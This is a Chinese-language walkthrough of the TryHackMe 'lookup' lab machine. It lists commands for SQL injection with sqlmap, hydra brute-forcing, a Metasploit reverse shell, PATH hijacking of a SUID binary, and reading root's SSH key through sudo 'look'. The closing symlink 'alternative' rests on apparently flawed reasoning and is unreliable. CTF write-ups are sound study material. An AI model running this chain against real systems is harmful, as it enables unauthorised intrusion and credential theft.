TryHackMe - 「lookup」渗透测试实战教学文档<\/strong><\/h3>
概述<\/strong><\/h4>
本教学文档基于TryHackMe的lookup<\/code>靶机实战。该靶机涉及Web应用安全<\/strong>、漏洞利用<\/strong>和权限提升<\/strong>等多个核心知识点。核心攻击路径包括：通过SQL注入获取初始访问权限，利用路径劫持进行水平提权，最后通过滥用sudo<\/code>权限实现根权限获取。<\/p>
目标<\/strong>：获取两个标志性文件：<\/p>
user.txt<\/code><\/li> root.txt<\/code><\/li> <\/ol> 技术栈<\/strong>：<\/p> 漏洞利用<\/strong>：SQL注入、本地文件包含（LFI）、路径劫持、sudo权限滥用。<\/li> 工具<\/strong>：sqlmap<\/code>, hydra<\/code>, searchsploit<\/code>, metasploit<\/code>，以及基本的Linux命令。<\/li> <\/ul> 第一阶段：信息收集与初始访问<\/strong><\/h3> 1. 目标识别与扫描<\/strong><\/h4> 操作<\/strong>：将目标IP地址（10.201.45.109<\/code>）与域名 lookup.thm<\/code> 绑定，以便通过域名访问。命令：vim \/etc\/hosts<\/code><\/li> 添加内容：10.201.45.109 lookup.thm<\/code><\/li> <\/ul> <\/li> 目的<\/strong>：许多Web应用依赖域名进行虚拟主机配置，直接使用IP可能无法正常访问。<\/li> <\/ul> 2. Web应用探测与SQL注入<\/strong><\/h4> 发现<\/strong>：目标存在一个登录页面 http:\/\/lookup.thm\/login.php<\/code>。<\/li> 漏洞利用<\/strong>：使用 sqlmap<\/code> 对登录表单进行自动化SQL注入检测。命令<\/strong>： sqlmap -u "http:\/\/lookup.thm\/login.php"<\/span> --data=<\/span>"username=test&password=test"<\/span> --method=<\/span>POST --level=<\/span>5<\/span> --risk=<\/span>3<\/span> --dbs <\/span><\/span><\/code><\/pre><\/li> 参数解释<\/strong>： --data<\/code>：指定POST请求的数据。<\/li> --level<\/code> 和 --risk<\/code>：提高检测的强度和广度。<\/li> --dbs<\/code>：尝试枚举数据库。<\/li> <\/ul> <\/li> <\/ul> <\/li> 关键发现<\/strong>：sqlmap<\/code> 提示 username<\/code> 参数存在动态响应，表明可能存在注入点。但直接枚举数据库可能受阻，转而采用更直接的方法：爆破用户名和密码<\/strong>。<\/li> <\/ul> 3. 凭证爆破<\/strong><\/h4> 用户名枚举<\/strong>：通过SQL注入或工具（如sqlmap<\/code>的--users<\/code>选项）发现两个有效用户名：jose<\/code> 和一个未知用户。<\/li> 密码爆破<\/strong>：使用 hydra<\/code> 对用户 jose<\/code> 进行密码爆破。命令<\/strong>： hydra -l jose -P xato-net-10-million-passwords-10000.txt lookup.thm http-post-form "\/login.php:username=^USER^&password=^PASS^:F=Wrong password. Please try again."<\/span> -t 64<\/span> <\/span><\/span><\/code><\/pre><\/li> 参数解释<\/strong>： http-post-form<\/code>：指定基于POST表单的爆破。<\/li> F=Wrong password...<\/code>：指定登录失败时返回的页面特征，hydra<\/code> 据此判断爆破是否成功。<\/li> <\/ul> <\/li> <\/ul> <\/li> 结果<\/strong>：成功获取到 jose<\/code> 的密码。<\/li> <\/ul> 4. 登录与进一步发现<\/strong><\/h4> 操作<\/strong>：使用 jose<\/code> 的凭证登录系统。<\/li> 新目标<\/strong>：登录后，页面提示需要访问 file.lookup.thm<\/code>。<\/li> 操作<\/strong>：再次修改 \/etc\/hosts<\/code> 文件，将 file.lookup.thm<\/code> 也解析到同一IP。添加内容：10.201.45.109 file.lookup.thm<\/code><\/li> <\/ul> <\/li> 重新访问<\/strong>：再次登录后，成功进入应用的主界面。<\/li> <\/ul> 第二阶段：漏洞利用与获取初始Shell<\/strong><\/h3> 1. 利用LFI漏洞<\/strong><\/h4> 发现<\/strong>：应用存在本地文件包含漏洞，可能通过参数（如?page=<\/code>或?file=<\/code>）包含服务器上的任意文件。<\/li> 利用<\/strong>：使用 searchsploit<\/code> 查找公开的LFI漏洞利用代码。命令<\/strong>：searchsploit elfinder<\/code><\/li> 说明<\/strong>：elfinder<\/code> 是一个常见的Web文件管理器，历史上存在多个LFI和RCE漏洞。<\/li> <\/ul> <\/li> 自动化利用<\/strong>：使用 metasploit<\/code> 框架中的对应 exploit 模块。命令<\/strong>： msfconsole <\/span><\/span>search elfinder <\/span><\/span>use <对应的exploit模块路径> <\/span><\/span>set rhosts file.lookup.thm <\/span><\/span>set lhost <你的VPN_IP> <\/span><\/span>set lport <监听端口> <\/span><\/span>run <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> 结果<\/strong>：成功利用漏洞，获取一个反向Shell，以www-data<\/code>用户权限连接到攻击机。<\/li> <\/ul> 2. 稳定Shell<\/strong><\/h4> 操作<\/strong>：将简单的反向Shell升级为完全交互式的TTY Shell，方便后续操作。命令<\/strong>： python3 -c 'import pty; pty.spawn("\/bin\/bash")'<\/span> <\/span><\/span><\/code><\/pre><\/li> 效果<\/strong>：获得支持标签补全、历史命令等功能的完整Shell。<\/li> <\/ul> <\/li> <\/ul> 第三阶段：水平提权（www-data -> think）<\/strong><\/h3> 1. 枚举系统用户<\/strong><\/h4> 操作<\/strong>：查找可以登录系统的用户。命令<\/strong>：cat \/etc\/passwd | grep 'sh$'<\/code><\/li> 发现<\/strong>：除了jose<\/code>和www-data<\/code>，还存在一个名为 think<\/code> 的用户。<\/li> <\/ul> <\/li> <\/ul> 2. 发现SUID二进制文件与路径劫持<\/strong><\/h4> 操作<\/strong>：查找具有SUID权限的可执行文件，这些文件可能被利用来提权。命令<\/strong>：find \/ -perm \/4000 2>\/dev\/null<\/code><\/li> 关键发现<\/strong>：发现一个名为 pwm<\/code> 的非标准SUID二进制文件。<\/li> <\/ul> <\/li> 分析pwm<\/code>程序<\/strong>：运行<\/strong>：直接执行 pwm<\/code>。<\/li> 行为观察<\/strong>：程序首先执行 id<\/code> 命令，然后根据 id<\/code> 命令的输出（当前用户名），去读取 \/home\/<username>\/.passwords<\/code> 文件。<\/li> <\/ul> <\/li> 攻击思路 - 路径劫持<\/strong>： pwm<\/code> 调用了 id<\/code> 命令，但没有使用绝对路径（如 \/usr\/bin\/id<\/code>）。<\/li> Linux系统通过 PATH<\/code> 环境变量来查找命令。<\/li> 我们可以通过控制 PATH<\/code>，让系统优先执行我们自定义的恶意 id<\/code> 脚本，而不是真正的 id<\/code> 命令。<\/li> <\/ol> <\/li> 攻击步骤<\/strong>：查看当前PATH<\/strong>：echo $PATH<\/code><\/li> 创建恶意id<\/code>脚本<\/strong>：在 \/tmp<\/code> 目录下创建一个名为 id<\/code> 的脚本，内容为伪造的 id<\/code> 命令输出，将用户名伪装成 think<\/code>。 echo -e '#!\/bin\/bash\necho "uid=33(think) gid=33(think) groups=33(think)"'<\/span> > \/tmp\/id <\/span><\/span><\/code><\/pre><\/li> 赋予执行权限<\/strong>：chmod +x \/tmp\/id<\/code><\/li> 修改PATH环境变量<\/strong>：让系统先在 \/tmp<\/code> 目录下寻找命令。 export PATH=<\/span>\/tmp:$PATH <\/span><\/span><\/code><\/pre><\/li> 执行pwm<\/code><\/strong>：再次运行 pwm<\/code>。此时，它会执行我们恶意的 \/tmp\/id<\/code> 脚本，并认为当前用户是 think<\/code>，进而去读取 \/home\/think\/.passwords<\/code> 文件。<\/li> <\/ol> <\/li> 结果<\/strong>：成功获取到 think<\/code> 用户的密码（或密码列表）。<\/li> <\/ul> 3. 切换至think用户<\/strong><\/h4> 操作<\/strong>：使用获取到的密码通过SSH登录到 think<\/code> 用户。命令<\/strong>：hydra -l think -P password.txt ssh:\/\/lookup.thm<\/code> (如果密码是列表) 或直接 ssh think@lookup.thm<\/code>。<\/li> <\/ul> <\/li> 成果<\/strong>：成功登录，并找到第一个标志文件 user.txt<\/code>。<\/li> <\/ul> 第四阶段：垂直提权（think -> root）<\/strong><\/h3> 1. 枚举sudo权限<\/strong><\/h4> 操作<\/strong>：检查 think<\/code> 用户可以使用 sudo<\/code> 执行哪些命令。命令<\/strong>：sudo -l<\/code><\/li> <\/ul> <\/li> 关键发现<\/strong>： User think may run the following commands on ip-10-201-3-252: (ALL) \/usr\/bin\/look <\/code><\/pre> 这表示 think<\/code> 用户可以以 root权限<\/strong> 运行 \/usr\/bin\/look<\/code> 命令。<\/li> <\/ul> <\/li> <\/ul> 2. 滥用sudo权限 - 利用look<\/code>命令读取任意文件<\/strong><\/h4> look<\/code>命令说明<\/strong>：look<\/code> 命令默认在系统中查找以给定字符串开头的单词。但它有一个关键特性：如果指定了文件名，它会读取该文件。<\/li> 攻击思路<\/strong>：由于我们可以以root权限运行 look<\/code>，并且可以指定文件，那么我们就可以读取系统上的任何文件，包括属于root用户的敏感文件。<\/li> 利用方法<\/strong>：读取root的SSH私钥。命令<\/strong>：sudo \/usr\/bin\/look '' \/root\/.ssh\/id_rsa<\/code><\/li> 技巧<\/strong>：将查找字符串设为空 ''<\/code>，这样 look<\/code> 会读取整个文件内容并输出到屏幕。<\/li> <\/ul> <\/li> 将输出的私钥内容复制到攻击机的本地文件（例如 root_key<\/code>）。<\/li> 修改私钥文件权限为600（仅当前用户可读）。命令<\/strong>：chmod 600 root_key<\/code><\/li> <\/ul> <\/li> 使用此私钥直接以root身份SSH登录目标。命令<\/strong>：ssh -i root_key root@lookup.thm<\/code><\/li> <\/ul> <\/li> <\/ol> <\/li> <\/ul> 3. 替代思路（文档中提及的巧妙方法）<\/strong><\/h4> 在第一次提权（www-data<\/code> -> think<\/code>）时，可以提前为root的私钥创建一个符号链接，这样在利用pwm<\/code>程序时就能直接获取。<\/p> 操作<\/strong>：在获得www-data<\/code> shell后，执行： ln -s \/root\/.ssh\/id_rsa \/var\/www\/html\/.passwords <\/span><\/span><\/code><\/pre><\/li> 原理<\/strong>：当pwm<\/code>程序以root权限（通过路径劫持欺骗后）去读取\/home\/think\/.passwords<\/code>时，如果此文件不存在，但我们在\/var\/www\/html<\/code>下创建了符号链接，程序可能会错误地读取到符号链接指向的root私钥。这是一种更巧妙的“一石二鸟”的方法。<\/li> <\/ul> 最终成果<\/strong><\/h4> 成功获得root权限，找到第二个标志文件 root.txt<\/code>，完成整个渗透测试。<\/p> 知识点总结<\/strong><\/h3> SQL注入<\/strong>：自动化工具sqlmap<\/code>的使用是Web渗透的起点。<\/li> 凭证爆破<\/strong>：hydra<\/code>是进行网络服务爆破的强大工具。<\/li> 本地文件包含<\/strong>：searchsploit<\/code>和metasploit<\/code>在利用已知漏洞时极其高效。<\/li> Shell稳定化<\/strong>：使用Python快速获取交互式Shell。<\/li> Linux权限提升<\/strong>：路径劫持<\/strong>：当SUID程序调用未指定绝对路径的命令时，通过控制PATH<\/code>环境变量实现权限提升。<\/li> SUID权限滥用<\/strong>：find \/ -perm \/4000<\/code>是提权枚举的关键命令。<\/li> Sudo权限滥用<\/strong>：sudo -l<\/code>必须检查。即使是一个看似无害的命令（如look<\/code>），如果配置不当（允许以root身份运行且无限制），也能成为读取敏感文件的利器。<\/li> <\/ul> <\/li> 符号链接攻击<\/strong>：利用符号链接指向敏感文件，是组合漏洞利用的高级技巧。<\/li> <\/ol> 这份文档详尽地还原了“lookup”靶机的攻击链，希望对你的学习有所帮助。<\/p>